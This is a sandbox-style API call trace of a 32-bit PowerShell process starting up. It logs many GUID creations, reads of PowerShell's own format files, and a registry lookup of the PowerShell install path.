	[0225.554] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x82250de4, Data2=0x8ef1, Data3=0x46e6, Data4=([0]=0x9d, [1]=0x76, [2]=0x2d, [3]=0x6d, [4]=0xf5, [5]=0x1f, [6]=0x7b, [7]=0x9))) returned 0x0
	[0225.554] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xbfcb3674, Data2=0xde05, Data3=0x4f69, Data4=([0]=0x81, [1]=0x57, [2]=0x26, [3]=0x4b, [4]=0xc9, [5]=0xe9, [6]=0x88, [7]=0x2c))) returned 0x0
	[0225.555] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xce1630fb, Data2=0x46ac, Data3=0x47b1, Data4=([0]=0x81, [1]=0x57, [2]=0x53, [3]=0x1, [4]=0xf2, [5]=0xce, [6]=0xe0, [7]=0x1))) returned 0x0
	[0225.556] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x2d6ef723, Data2=0x6f27, Data3=0x4e8a, Data4=([0]=0x8e, [1]=0x43, [2]=0xb4, [3]=0x79, [4]=0x80, [5]=0xe8, [6]=0xf9, [7]=0xfd))) returned 0x0
	[0225.556] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc96f9572, Data2=0x599d, Data3=0x441c, Data4=([0]=0x84, [1]=0xf8, [2]=0xdb, [3]=0xa4, [4]=0x6c, [5]=0x2a, [6]=0x78, [7]=0x73))) returned 0x0
	[0225.556] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x17f642ba, Data2=0xee77, Data3=0x49ee, Data4=([0]=0x99, [1]=0xe5, [2]=0xde, [3]=0x69, [4]=0x90, [5]=0x5b, [6]=0x82, [7]=0xc4))) returned 0x0
	[0225.556] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xb65b011c, Data2=0x96f5, Data3=0x4e67, Data4=([0]=0xb4, [1]=0x21, [2]=0xf9, [3]=0x92, [4]=0x8, [5]=0x64, [6]=0x4b, [7]=0x4e))) returned 0x0
	[0225.557] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c
	[0225.558] GetLastError () returned 0x0
	[0225.558] GetFileType (hFile=0x35c) returned 0x1
	[0225.558] SetErrorMode (uMode=0x1) returned 0x1
	[0225.558] GetFileType (hFile=0x35c) returned 0x1
	[0225.558] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.558] GetLastError () returned 0x0
	[0225.558] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.558] GetLastError () returned 0x0
	[0225.559] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.559] GetLastError () returned 0x0
	[0225.559] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.559] GetLastError () returned 0x0
	[0225.560] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.560] GetLastError () returned 0x0
	[0225.560] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.561] GetLastError () returned 0x0
	[0225.561] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.561] GetLastError () returned 0x0
	[0225.561] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.573] GetLastError () returned 0x0
	[0225.573] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.573] GetLastError () returned 0x0
	[0225.575] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.575] GetLastError () returned 0x0
	[0225.575] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.575] GetLastError () returned 0x0
	[0225.575] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.575] GetLastError () returned 0x0
	[0225.576] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.576] GetLastError () returned 0x0
	[0225.576] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.576] GetLastError () returned 0x0
	[0225.576] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.576] GetLastError () returned 0x0
	[0225.577] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.577] GetLastError () returned 0x0
	[0225.577] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.577] GetLastError () returned 0x0
	[0225.580] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.580] GetLastError () returned 0x0
	[0225.580] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.580] GetLastError () returned 0x0
	[0225.580] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.580] GetLastError () returned 0x0
	[0225.580] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.580] GetLastError () returned 0x0
	[0225.581] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0xe67, lpOverlapped=0x0) returned 1
	[0225.581] GetLastError () returned 0x0
	[0225.581] ReadFile (in: hFile=0x35c, lpBuffer=0x30a58eb, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a58eb*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.581] GetLastError () returned 0x0
	[0225.581] ReadFile (in: hFile=0x35c, lpBuffer=0x30a62e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x30a62e4*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.581] GetLastError () returned 0x0
	[0225.582] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x35c) returned 0x0
	[0225.582] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.582] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.582] RegCloseKey (hKey=0x35c) returned 0x0
	[0225.586] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x26e23714, Data2=0x8800, Data3=0x4128, Data4=([0]=0xb8, [1]=0xd9, [2]=0xf9, [3]=0xc, [4]=0x12, [5]=0x42, [6]=0xcf, [7]=0xe9))) returned 0x0
	[0225.586] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xb7b86faf, Data2=0x759c, Data3=0x4c8f, Data4=([0]=0x85, [1]=0xe3, [2]=0x51, [3]=0x1a, [4]=0x36, [5]=0x42, [6]=0x7b, [7]=0x67))) returned 0x0
	[0225.587] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc839980, Data2=0x90dd, Data3=0x4042, Data4=([0]=0xa6, [1]=0x8f, [2]=0x76, [3]=0xfb, [4]=0xed, [5]=0xa5, [6]=0x34, [7]=0x42))) returned 0x0
	[0225.587] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xd188b874, Data2=0xb402, Data3=0x40f8, Data4=([0]=0xb2, [1]=0x11, [2]=0x1e, [3]=0x29, [4]=0xe4, [5]=0xc4, [6]=0xf, [7]=0x36))) returned 0x0
	[0225.587] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x5d172c34, Data2=0x73d1, Data3=0x41bf, Data4=([0]=0xb7, [1]=0x8c, [2]=0x18, [3]=0x60, [4]=0xff, [5]=0xd6, [6]=0x5d, [7]=0xab))) returned 0x0
	[0225.587] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x9d8dd835, Data2=0x50f7, Data3=0x461e, Data4=([0]=0xb2, [1]=0x30, [2]=0x3c, [3]=0x95, [4]=0x6d, [5]=0xa3, [6]=0x30, [7]=0xef))) returned 0x0
	[0225.587] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x115bd0ff, Data2=0xf38b, Data3=0x4e52, Data4=([0]=0xba, [1]=0xa6, [2]=0x9d, [3]=0xb5, [4]=0x28, [5]=0x90, [6]=0x81, [7]=0x34))) returned 0x0
	[0225.588] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x34e7d20e, Data2=0x752b, Data3=0x4b04, Data4=([0]=0xa8, [1]=0x5c, [2]=0x6c, [3]=0xbf, [4]=0xce, [5]=0xc4, [6]=0x3b, [7]=0x2))) returned 0x0
	[0225.588] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x459f1cf6, Data2=0x9be9, Data3=0x4942, Data4=([0]=0x94, [1]=0xf6, [2]=0xd2, [3]=0x22, [4]=0x84, [5]=0xa2, [6]=0x9e, [7]=0x5e))) returned 0x0
	[0225.588] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x5bc74ccc, Data2=0x35d8, Data3=0x4f2f, Data4=([0]=0x89, [1]=0x10, [2]=0x4e, [3]=0x7f, [4]=0xe4, [5]=0xb8, [6]=0xe8, [7]=0x91))) returned 0x0
	[0225.589] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xec7fcaf2, Data2=0x10ed, Data3=0x4f05, Data4=([0]=0x97, [1]=0x54, [2]=0xa4, [3]=0xb4, [4]=0x6a, [5]=0x9a, [6]=0x29, [7]=0x1a))) returned 0x0
	[0225.589] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xfbdedc97, Data2=0x125b, Data3=0x4003, Data4=([0]=0x9c, [1]=0x33, [2]=0x1a, [3]=0x76, [4]=0x3e, [5]=0x59, [6]=0xd8, [7]=0x21))) returned 0x0
	[0225.589] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x94cce875, Data2=0xd943, Data3=0x45e1, Data4=([0]=0x8c, [1]=0xbe, [2]=0xff, [3]=0x2c, [4]=0xee, [5]=0x25, [6]=0x9e, [7]=0xea))) returned 0x0
	[0225.589] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x497ffc38, Data2=0x7ca2, Data3=0x408b, Data4=([0]=0xa9, [1]=0xaa, [2]=0x9, [3]=0x83, [4]=0xfd, [5]=0x92, [6]=0x83, [7]=0x2c))) returned 0x0
	[0225.590] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xae7f0a87, Data2=0xd47e, Data3=0x40e0, Data4=([0]=0x95, [1]=0x40, [2]=0x8c, [3]=0xbc, [4]=0xeb, [5]=0xb1, [6]=0x59, [7]=0xc5))) returned 0x0
	[0225.590] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x36e176ac, Data2=0xc389, Data3=0x4cba, Data4=([0]=0xb9, [1]=0x8, [2]=0xfd, [3]=0x4a, [4]=0x58, [5]=0x65, [6]=0x90, [7]=0x80))) returned 0x0
	[0225.590] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xe0a894d, Data2=0xa963, Data3=0x410f, Data4=([0]=0xa9, [1]=0xd8, [2]=0x3e, [3]=0xd1, [4]=0xbd, [5]=0x95, [6]=0xec, [7]=0x7f))) returned 0x0
	[0225.590] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x8eb8a3d5, Data2=0x4071, Data3=0x4189, Data4=([0]=0xa1, [1]=0x1, [2]=0xa9, [3]=0xc5, [4]=0xa1, [5]=0xc5, [6]=0x1d, [7]=0x74))) returned 0x0
	[0225.590] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x27d3561a, Data2=0xb5a9, Data3=0x4650, Data4=([0]=0x8f, [1]=0xed, [2]=0x2, [3]=0xdd, [4]=0x45, [5]=0x8c, [6]=0x4f, [7]=0x76))) returned 0x0
	[0225.591] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x50138479, Data2=0x78e9, Data3=0x4141, Data4=([0]=0x92, [1]=0xe0, [2]=0x4b, [3]=0xb0, [4]=0x67, [5]=0x79, [6]=0xe7, [7]=0x1e))) returned 0x0
	[0225.591] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x85779636, Data2=0xfd61, Data3=0x4950, Data4=([0]=0x83, [1]=0xbe, [2]=0x44, [3]=0x1b, [4]=0xb6, [5]=0x43, [6]=0x1e, [7]=0xed))) returned 0x0
	[0225.592] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x380d6030, Data2=0xb1ad, Data3=0x4a94, Data4=([0]=0xbc, [1]=0x8b, [2]=0xde, [3]=0x22, [4]=0x57, [5]=0x9b, [6]=0x9c, [7]=0x48))) returned 0x0
	[0225.686] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x7c773236, Data2=0x9e76, Data3=0x4b77, Data4=([0]=0x9e, [1]=0xec, [2]=0x21, [3]=0x99, [4]=0xb9, [5]=0x28, [6]=0x2f, [7]=0xf0))) returned 0x0
	[0225.687] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x462febd2, Data2=0x18f4, Data3=0x466d, Data4=([0]=0xa8, [1]=0x3c, [2]=0x49, [3]=0x7c, [4]=0x38, [5]=0x33, [6]=0xbd, [7]=0x1c))) returned 0x0
	[0225.687] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x5616f7b8, Data2=0x53e0, Data3=0x47ab, Data4=([0]=0x80, [1]=0x54, [2]=0xc2, [3]=0x33, [4]=0x6e, [5]=0x42, [6]=0xcf, [7]=0x39))) returned 0x0
	[0225.688] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc0f6719d, Data2=0x97a5, Data3=0x4d0b, Data4=([0]=0x9c, [1]=0x27, [2]=0xb1, [3]=0xbe, [4]=0x80, [5]=0xbb, [6]=0x6f, [7]=0x83))) returned 0x0
	[0225.688] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x2f6b6043, Data2=0x1fb5, Data3=0x42da, Data4=([0]=0xa0, [1]=0xd0, [2]=0x7b, [3]=0x61, [4]=0x5, [5]=0x6, [6]=0x3a, [7]=0xe4))) returned 0x0
	[0225.688] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x887093a1, Data2=0xe05a, Data3=0x4951, Data4=([0]=0x9e, [1]=0xd2, [2]=0x17, [3]=0x5b, [4]=0x4f, [5]=0x16, [6]=0xf1, [7]=0xb2))) returned 0x0
	[0225.688] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x15d70d93, Data2=0xfa86, Data3=0x47c0, Data4=([0]=0xa3, [1]=0x6b, [2]=0x30, [3]=0x1a, [4]=0x2, [5]=0xdc, [6]=0x49, [7]=0xc3))) returned 0x0
	[0225.689] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xb9145bfd, Data2=0x2dcb, Data3=0x41ed, Data4=([0]=0x92, [1]=0x40, [2]=0x7c, [3]=0x72, [4]=0x3, [5]=0x52, [6]=0xd2, [7]=0xd))) returned 0x0
	[0225.689] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xe7ee3392, Data2=0x769f, Data3=0x43da, Data4=([0]=0xb2, [1]=0x54, [2]=0x16, [3]=0x44, [4]=0xa3, [5]=0x44, [6]=0xc7, [7]=0xad))) returned 0x0
	[0225.689] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x3b63fe63, Data2=0xe716, Data3=0x47ac, Data4=([0]=0xaa, [1]=0xa, [2]=0x2e, [3]=0x5, [4]=0x27, [5]=0x5c, [6]=0xcd, [7]=0x4a))) returned 0x0
	[0225.689] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xf1078043, Data2=0xd6e8, Data3=0x4ad2, Data4=([0]=0xb9, [1]=0xc2, [2]=0x57, [3]=0x15, [4]=0x76, [5]=0xc9, [6]=0x33, [7]=0x2a))) returned 0x0
	[0225.693] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x319d8f98, Data2=0xdfcb, Data3=0x48e7, Data4=([0]=0x85, [1]=0x6b, [2]=0x57, [3]=0x18, [4]=0xa7, [5]=0xd1, [6]=0x6a, [7]=0x9d))) returned 0x0
	[0225.694] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x4a12ed8d, Data2=0x69ce, Data3=0x4a1e, Data4=([0]=0x87, [1]=0xaf, [2]=0x7c, [3]=0x69, [4]=0x1, [5]=0x5c, [6]=0x36, [7]=0x2a))) returned 0x0
	[0225.694] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x187899e7, Data2=0x4ea6, Data3=0x462f, Data4=([0]=0xbc, [1]=0xfa, [2]=0x74, [3]=0x89, [4]=0xf3, [5]=0xef, [6]=0x72, [7]=0x1e))) returned 0x0
	[0225.694] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x49fb608f, Data2=0xd8cc, Data3=0x4bbf, Data4=([0]=0xa1, [1]=0x80, [2]=0x40, [3]=0x9b, [4]=0xcf, [5]=0xc1, [6]=0xc7, [7]=0x5c))) returned 0x0
	[0225.695] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xb192cf3a, Data2=0xb4f7, Data3=0x4d4d, Data4=([0]=0x97, [1]=0xe3, [2]=0x81, [3]=0x27, [4]=0xd2, [5]=0x10, [6]=0xcb, [7]=0xc7))) returned 0x0
	[0225.695] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xd349b6e7, Data2=0xa19e, Data3=0x40cc, Data4=([0]=0x8a, [1]=0xfe, [2]=0x5, [3]=0xdc, [4]=0x80, [5]=0x5b, [6]=0xed, [7]=0xa6))) returned 0x0
	[0225.695] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x216d7dd, Data2=0x4a13, Data3=0x4178, Data4=([0]=0xa8, [1]=0x49, [2]=0xcc, [3]=0x9c, [4]=0xf1, [5]=0x4e, [6]=0xc9, [7]=0x49))) returned 0x0
	[0225.695] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x26e99c2c, Data2=0x1adf, Data3=0x4be6, Data4=([0]=0xa5, [1]=0x5f, [2]=0x6e, [3]=0xe6, [4]=0xcf, [5]=0xd4, [6]=0xe3, [7]=0x93))) returned 0x0
	[0225.696] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x441b177c, Data2=0xa0c4, Data3=0x40bd, Data4=([0]=0x81, [1]=0x41, [2]=0x54, [3]=0xe3, [4]=0xd8, [5]=0x70, [6]=0x7f, [7]=0xcc))) returned 0x0
	[0225.696] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x23cbf5a4, Data2=0x4c29, Data3=0x46db, Data4=([0]=0x9f, [1]=0x1b, [2]=0xfe, [3]=0x9a, [4]=0x9a, [5]=0x52, [6]=0x1c, [7]=0x6f))) returned 0x0
	[0225.696] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x94a0fcaf, Data2=0xcecf, Data3=0x4147, Data4=([0]=0x99, [1]=0x77, [2]=0xaa, [3]=0xf1, [4]=0x1e, [5]=0x9e, [6]=0xd3, [7]=0x23))) returned 0x0
	[0225.697] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x228679f, Data2=0x39c5, Data3=0x4c48, Data4=([0]=0x85, [1]=0x62, [2]=0x6c, [3]=0x13, [4]=0xc8, [5]=0x86, [6]=0xee, [7]=0xd8))) returned 0x0
	[0225.697] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x3a78249b, Data2=0xb61c, Data3=0x4aa5, Data4=([0]=0x8a, [1]=0x17, [2]=0x52, [3]=0x6a, [4]=0xb8, [5]=0xe2, [6]=0x31, [7]=0xb8))) returned 0x0
	[0225.697] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x8dac3597, Data2=0x30ad, Data3=0x433f, Data4=([0]=0xba, [1]=0x86, [2]=0x55, [3]=0xa6, [4]=0xcd, [5]=0x81, [6]=0x5e, [7]=0x5b))) returned 0x0
	[0225.697] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x77dc37e2, Data2=0xa3a2, Data3=0x4c1b, Data4=([0]=0x8d, [1]=0x2a, [2]=0x5c, [3]=0x58, [4]=0xd1, [5]=0x28, [6]=0x67, [7]=0x15))) returned 0x0
	[0225.698] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c
	[0225.699] GetLastError () returned 0x0
	[0225.699] GetFileType (hFile=0x35c) returned 0x1
	[0225.699] SetErrorMode (uMode=0x1) returned 0x1
	[0225.699] GetFileType (hFile=0x35c) returned 0x1
	[0225.699] ReadFile (in: hFile=0x35c, lpBuffer=0x3196cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x3196cbc*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.699] GetLastError () returned 0x0
	[0225.700] ReadFile (in: hFile=0x35c, lpBuffer=0x3196cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x3196cbc*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.700] GetLastError () returned 0x0
	[0225.700] ReadFile (in: hFile=0x35c, lpBuffer=0x3196cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x3196cbc*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.701] GetLastError () returned 0x0
	[0225.701] ReadFile (in: hFile=0x35c, lpBuffer=0x3196cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x3196cbc*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.701] GetLastError () returned 0x0
	[0225.702] ReadFile (in: hFile=0x35c, lpBuffer=0x3196cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x3196cbc*, lpNumberOfBytesRead=0x10ea34*=0x8b4, lpOverlapped=0x0) returned 1
	[0225.702] GetLastError () returned 0x0
	[0225.702] ReadFile (in: hFile=0x35c, lpBuffer=0x3196110, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x3196110*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.702] GetLastError () returned 0x0
